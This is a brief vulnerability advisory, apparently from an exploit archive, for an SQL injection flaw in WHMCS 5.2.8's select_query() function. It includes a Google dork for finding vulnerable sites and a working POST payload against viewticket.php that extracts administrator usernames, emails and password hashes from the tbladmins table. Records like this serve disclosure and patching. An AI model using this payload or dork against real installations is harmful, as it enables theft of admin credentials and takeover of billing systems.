WHMCS 5.2.8 – SQL Injection Vulnerability-vulnerability warning-the black bar safety net

2014-02-11T00:00:00
ID MYHACK58:62201442320
Type myhack58
Reporter 佚名
Modified 2014-02-11T00:00:00

Description

Google Dork: "powered by WHMCS"

Exploit Author: g00n ( Xploiter.net )

Vendor Homepage: http://www.whmcs.com/

Software Link: http://www.whmcs.com/

Version: 5.2.8

Tested on: Windows, Linux

Vulnerable file: /includes/dbfunctions.php

POC:

select_query() function is vulnerable due to Register Globals

Example:

/whmcs/viewticket.php

POST: tid[sqltype]=TABLEJOIN&tid[value]=-1 union select 1,0,0,0,0,0,0,0,0,0,0,(SELECT GROUP_CONCAT(id,0x3a,username,0x3a,email,0x3a,password SEPARATOR 0x2c20) FROM tbladmins),0,0,0,0,0,0,0,0,0,0,0#